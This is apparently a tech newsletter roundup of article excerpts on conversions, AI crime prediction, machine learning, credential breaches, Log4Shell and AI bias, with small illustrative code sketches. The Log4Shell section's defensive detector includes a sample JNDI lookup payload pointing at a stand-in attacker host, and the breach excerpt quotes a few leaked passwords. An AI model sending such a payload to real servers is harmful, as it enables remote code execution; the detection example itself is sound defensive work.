10 data-driven strategies to spark conversions in 2022

Conversion begins with a click. And clicks come after you have successfully

grabbed your user’s attention. A headline is often the first thing your users

come across, and hence an excellent tool to use for grabbing their attention.

Therefore, using attention-grabbing headlines (paired with other factors) can

lead to better conversions. This is not a license to create controversial

and low-value titles. Grab attention while delivering value and maintaining

class. Again, tap into website analytics to find out which headlines have

worked the best for you. If you are entirely new to the website world, know

that headlines with numbers have been shown to have 30% higher conversions than

those without numbers. Additionally, short and concise headlines that have a

negative superlative (like “x things you have never seen before” or “x

killer Instagram profiles you need to follow”) have a higher tendency to earn

more clicks. A/B testing or split testing reveals incredibly insightful data

that can work wonders on your bottom line.
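
As a rough illustration of what a split test on two headlines involves, the sketch below compares their click-through rates with a two-proportion z-test. The function name and the click and view counts in the usage lines are made up for illustration; they do not come from the article, and a real test would also need a sample size planned in advance.

```python
import math


def two_proportion_z_test(clicks_a, views_a, clicks_b, views_b):
    """Two-sided z-test for a difference in click-through rate.

    Returns (rate_a, rate_b, z, p_value). Assumes both variants received
    some views and that the pooled rate is strictly between 0 and 1.
    """
    rate_a = clicks_a / views_a
    rate_b = clicks_b / views_b
    # Pooled rate under the null hypothesis that both headlines perform the same.
    pooled = (clicks_a + clicks_b) / (views_a + views_b)
    std_err = math.sqrt(pooled * (1 - pooled) * (1 / views_a + 1 / views_b))
    z = (rate_b - rate_a) / std_err
    # Two-sided p-value from the standard normal distribution.
    p_value = math.erfc(abs(z) / math.sqrt(2))
    return rate_a, rate_b, z, p_value


# Hypothetical counts: headline A without a number, headline B with one.
rate_a, rate_b, z, p_value = two_proportion_z_test(120, 2400, 156, 2400)
print(f"A: {rate_a:.3f}  B: {rate_b:.3f}  z: {z:.2f}  p: {p_value:.4f}")
```

A small p-value suggests the difference in click-through rate is unlikely to be chance alone; it says nothing about downstream conversions, which would need their own measurement.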

TechScape: can AI really predict crime?

The LAPD is working with a company called Voyager Analytics on a trial

basis. Documents the Guardian reviewed and wrote about in November show that

Voyager Analytics claimed it could use AI to analyse social media profiles to

detect emerging threats based on a person’s friends, groups, posts and more.

It was essentially Operation Laser for the digital world. Instead of focusing

on physical places or people, Voyager looked at the digital worlds of people

of interest to determine whether they were involved in crime rings or planned

to commit future crimes, based on who they interacted with, things they’ve

posted, and even their friends of friends. “It’s a ‘guilt by association’

system,” said Meredith Broussard, a New York University data journalism

professor. Voyager claims all of this information on individuals, groups and

pages allows its software to conduct real-time “sentiment analysis” and find

new leads when investigating “ideological solidarity”. “We don’t just connect

existing dots,” a Voyager promotional document read. “We create new dots. What

seem like random and inconsequential interactions, behaviours or interests,

suddenly become clear and comprehensible.”

Privacy and Confidentiality in Security Testing

Now that we understand the difference between privacy and confidentiality and

how they can affect a person, we can talk about keeping both privacy and

confidentiality safe while testing. The increasing number of malware bots

makes business owners concerned about keeping data confidential. It also makes

implementing security testing vital for any software development, and

especially for web applications. Knowing how to test software to prevent any

personal data from being compromised on the site is essential. For this,

let’s go through the steps QA testers can take to implement security testing.

To illustrate our suggestions, we'll use the interface of aqua ALM, which is

popular among QA teams for test management in security testing. ... The main

goal of security testing is to protect applications from malware penetration

and unauthorized access, and to protect the confidentiality and privacy of a

person.



An introduction to the magic of machine learning

We hear about machine learning a lot these days, and in fact it’s all around

us. It can sound kind of mysterious, or even scary, but it turns out that

machine learning is just math. And to prove that it’s just math, I will

write this article the old-school way, with hand-written equations instead

of code. If you prefer to learn by… To explain what machine learning is and

how math makes it work, we will do a full walk-through of logistic

regression, a fairly simple but fundamental model that is in some sense the

building block of more complex models like neural networks. If I had to pick

one machine learning model to understand really well, this would be it. Most

often, we use logistic regression for a task called binary classification.

In binary classification, we want to learn how to predict whether a data

point belongs to one of two groups or classes, labeled 0 and 1. ... These

training data allow us to learn the optimal theta parameters. What does

optimal mean? Well, one reasonable and quite common definition is to say

that the optimal theta is the set of parameters that maximizes the

probability of obtaining our training data.
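
In symbols, that definition can be sketched as follows. The notation here is an assumption, since the excerpt elides the article's own equations: $x_i$ is a training point, $y_i \in \{0, 1\}$ is its label, $n$ is the number of training points, and the points are taken to be independent.

```latex
% Model: probability that point x_i belongs to class 1
p(y_i = 1 \mid x_i; \theta) = \sigma(\theta^\top x_i)
  = \frac{1}{1 + e^{-\theta^\top x_i}}

% Optimal parameters: maximize the probability of the training data
\hat{\theta} = \arg\max_{\theta} \prod_{i=1}^{n}
  \sigma(\theta^\top x_i)^{y_i} \bigl(1 - \sigma(\theta^\top x_i)\bigr)^{1 - y_i}

% Equivalent and easier to work with: maximize the log-likelihood
\hat{\theta} = \arg\max_{\theta} \sum_{i=1}^{n}
  \Bigl[ y_i \log \sigma(\theta^\top x_i)
       + (1 - y_i) \log \bigl(1 - \sigma(\theta^\top x_i)\bigr) \Bigr]
```

Taking the logarithm does not move the maximum, because the logarithm is strictly increasing; it only turns the product into a sum.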

Alternative Feature Selection Methods in Machine Learning

The "Wrapper Methods" category includes greedy algorithms that will try

every possible feature combination based on a step forward, step backward,

or exhaustive search. For each feature combination, these methods will train

a machine learning model, usually with cross-validation, and determine its

performance. Thus, wrapper methods are very computationally expensive, and

often, impossible to carry out. The "Embedded Methods," on the other hand,

train a single machine learning model and select features based on the

feature importance returned by that model. They tend to work very well in

practice and are faster to compute. On the downside, we can’t derive feature

importance values from all machine learning models. For example, we can’t

derive importance values from nearest neighbours. In addition, co-linearity

will affect the coefficient values returned by linear models, or the

importance values returned by decision tree based algorithms, which may mask

their real importance. Finally, decision tree based algorithms may not

perform well in very big feature spaces, and thus, the importance values

might be unreliable.
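
To make the step forward search concrete, here is a minimal sketch of a wrapper-style selection loop. The `score_subset` callback is hypothetical: in practice it would train a model on the given features and return a cross-validated score, which is where the computational cost comes from. The toy scoring function and feature names are invented purely so the example runs on its own.

```python
from typing import Callable, FrozenSet, List, Sequence


def step_forward_selection(
    features: Sequence[str],
    score_subset: Callable[[FrozenSet[str]], float],
    max_features: int,
) -> List[str]:
    """Greedily add the feature that most improves the score, one per round."""
    selected: List[str] = []
    best_score = float("-inf")
    while len(selected) < max_features:
        candidates = [f for f in features if f not in selected]
        if not candidates:
            break
        # One (expensive) evaluation per remaining feature in every round.
        scored = [(score_subset(frozenset(selected + [f])), f) for f in candidates]
        top_score, top_feature = max(scored)
        if top_score <= best_score:
            break  # no remaining feature improves the score
        selected.append(top_feature)
        best_score = top_score
    return selected


def toy_score(subset: FrozenSet[str]) -> float:
    """Stand-in for 'train a model and cross-validate' (illustrative only)."""
    gains = {"age": 0.30, "income": 0.20, "noise": -0.05}
    return sum(gains[f] for f in subset)


print(step_forward_selection(["age", "income", "noise"], toy_score, max_features=3))
```

The loop stops early once adding any remaining feature fails to improve the score, so it may return fewer than `max_features` features.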

Diversity in cybersecurity: Barriers and opportunities for women and minorities

Our world is getting increasingly digitized, and cybercrime continues to

break new records. As cyber risks intensify, organizations are beefing up

defenses and adding more outside consultants and resources to their teams.

But to their sad misfortune, they are getting hit by a major roadblock—a

long-standing shortage of qualified cybersecurity talent. A closer look at

the numbers reveals an even more startling statistic: women comprise only 25%

of the cybersecurity workforce, according to research from ISC2, despite

outpacing men in overall college enrollment. There are a number of reasons

why women and minorities pursuing cybersecurity careers can be significantly

beneficial to the overall industry. Here are two: People from different

genders, ethnicities and backgrounds can provide a fresh perspective to

solving highly complex security problems. And then there’s the simple fact

that leaving cybersecurity jobs unfilled puts businesses at risk. As the

cybersecurity skills gap continues to grow, that risk only increases.

Half-Billion Compromised Credentials Lurking on Open Cloud Server

“Through analysis, it became clear that these credentials were an

accumulation of breached datasets known and unknown,” the NCA said in a

statement provided to Hunt. “The fact that they had been placed on a U.K.

business’s cloud storage facility by unknown criminal actors meant the

credentials now existed in the public domain, and could be accessed by other

third parties to commit further fraud or cyber-offenses.” The passwords have

been added to HIBP, which means they’re searchable by individuals and

companies worldwide seeking to verify the security risk of a password before

usage. Previously unseen passwords include flamingo228, Alexei2005,

91177700, 123Tests and aganesq, Hunt said in a blog posting Monday. “It is

both unfortunate and mind boggling that over 200 million of the passwords

that were shared by U.K. NCA were brand new to the HIBP service,” Baber

Amin, COO at Veridium, said via email. “It points to the sheer size of the

problem, the problem being passwords, an archaic method of proving one’s

bonafides. If there was ever a call to action to work towards eliminating

passwords and finding alternates, then this has to be it.”
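
For readers who want to check a password against HIBP programmatically, the sketch below uses the public Pwned Passwords range endpoint, which is not described in the excerpt above. Only the first five characters of the password's SHA-1 hash are sent; the service returns the matching hash suffixes with counts, and the comparison happens locally. The function names and the User-Agent string are assumptions made for this example.

```python
import hashlib
import urllib.request

RANGE_URL = "https://api.pwnedpasswords.com/range/"


def split_hash(password):
    """Return (prefix, suffix) of the upper-case SHA-1 hex digest."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def count_in_range(suffix, range_body):
    """Look up a hash suffix in a response body of 'SUFFIX:COUNT' lines."""
    for line in range_body.splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate.upper() == suffix and count.strip().isdigit():
            return int(count)
    return 0


def pwned_count(password):
    """Query the range endpoint; only the 5-character prefix leaves the machine."""
    prefix, suffix = split_hash(password)
    request = urllib.request.Request(
        RANGE_URL + prefix,
        headers={"User-Agent": "hibp-range-sketch"},  # hypothetical client name
    )
    with urllib.request.urlopen(request, timeout=10) as response:
        body = response.read().decode("utf-8")
    return count_in_range(suffix, body)
```

Calling `pwned_count("flamingo228")` performs a network request and returns how many times that password appears in the dataset, or 0 if it is not found.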

A cybersecurity expert explains Log4Shell – the new vulnerability that affects computers worldwide

Log4Shell works by abusing a feature in Log4j that allows users to specify

custom code for formatting a log message. This feature allows Log4j to, for

example, log not only the username associated with each attempt to log in to

the server but also the person’s real name, if a separate server holds a

directory linking user names and real names. To do so, the Log4j server has

to communicate with the server holding the real names. Unfortunately, this

kind of code can be used for more than just formatting log messages. Log4j

allows third-party servers to submit software code that can perform all

kinds of actions on the targeted computer. This opens the door for nefarious

activities such as stealing sensitive information, taking control of the

targeted system and slipping malicious content to other users communicating

with the affected server. It is relatively simple to exploit Log4Shell. I

was able to reproduce the problem in my copy of Ghidra, a

reverse-engineering framework for security researchers, in just a couple of

minutes.
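
On the defensive side, the lookup strings that Log4Shell abuses take the form `${jndi:...}`; that detail comes from the public CVE-2021-44228 advisories rather than from the excerpt above. The sketch below flags log lines containing the plain form of that pattern. It is a naive first pass under that assumption, since obfuscated variants will slip past a simple regular expression, and the sample lines are invented.

```python
import re

# Plain, unobfuscated form of the lookup; case-insensitive to catch ${JNDI:...}.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def suspicious_lines(lines):
    """Return the log lines that contain a plain JNDI lookup string."""
    return [line for line in lines if JNDI_LOOKUP.search(line)]


# Invented sample log lines for illustration.
sample_log = [
    "GET /index.html 200",
    "User-Agent: ${jndi:ldap://attacker.example/a}",
    "login ok user=alice",
]
for line in suspicious_lines(sample_log):
    print("possible Log4Shell probe:", line)
```

A match only indicates that someone sent the string; whether the server is vulnerable depends on the Log4j version and configuration in use.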

The Metaverse is Overhyped; But by 2050, AI Will Make It Real

The metaverse today is not a place to go so much as a collection of

technologies surrounding tools like NVIDIA’s Omniverse that can create

simulations used to train robots and autonomous cars. It is an easier-to-use

and more comprehensive tool set, like what architects have used to create

virtual buildings, but with far more realistic results, including lighting

effects, reflections, and a limited application of physics. For point

simulation, the metaverse concept is workable, but it really is just a

better simulation platform for point projects today, and nowhere near the

full virtual world we expect. By the end of the decade, NVIDIA’s Earth-2

project should be viable. This is currently the most aggressive public

project in progress, and Earth-2 could well become the foundation of a far

broader use of the concept. Initially, Earth-2 will be limited by the

technology available at the time, but once it is workable, it will be able

to predict weather events more accurately and model potential climate change

remedies better than the simulations we currently have.

Eliminating artificial intelligence bias is everyone's job

As new tools are provided around the auditability of AI, we'll see a lot

more companies regularly reviewing their AI results. Today, many companies

buy a product in which the AI feature or capability is embedded, or is part

of a proprietary feature of that product, and so isn't exposed for

auditing. Companies may also stand up basic AI capabilities for a

specific use case, usually at the "discover" level of AI usage. However, in

each of these cases the auditing is usually limited. Where auditing really

becomes important is in "recommend" and "action" levels of AI. In these two

phases, it's important to use an auditing tool to avoid introducing bias and

skewing the results. One of the best ways to help with auditing AI is to use

one of the bigger cloud service providers' AI and ML services. Many of those

vendors have tools and tech stacks that allow you to track this

information. It is also key for identifying bias or bias-like behavior to be

part of the training for data scientists and AI and ML developers. The more

people are educated on what to look out for, the more prepared companies

will be to identify and mitigate AI bias.
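
One simple check an audit of "recommend" or "action" results might start with is comparing how often each group receives a positive outcome. The sketch below computes per-group selection rates and the gap between the highest and lowest. The metric choice, the function names, and the sample records are assumptions for illustration, not something the article prescribes, and a small gap on this one measure does not by itself show that a system is unbiased.

```python
from collections import defaultdict


def selection_rates(records):
    """Share of positive decisions per group.

    `records` is an iterable of (group, decision) pairs, where decision is
    truthy for a positive outcome (for example, a recommendation shown).
    """
    totals = defaultdict(int)
    positives = defaultdict(int)
    for group, decision in records:
        totals[group] += 1
        if decision:
            positives[group] += 1
    return {group: positives[group] / totals[group] for group in totals}


def parity_gap(rates):
    """Difference between the highest and lowest group selection rate."""
    return max(rates.values()) - min(rates.values())


# Invented audit sample: (group label, model decision).
audit_sample = [
    ("a", 1), ("a", 1), ("a", 0), ("a", 0),
    ("b", 1), ("b", 0), ("b", 0), ("b", 0),
]
rates = selection_rates(audit_sample)
print(rates, "gap:", parity_gap(rates))
```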

Quote for the day:

“Hard times are sometimes blessings in disguise. We do have to suffer but

in the end it makes us strong, better and wise.” --

Anurag Prakash Ray
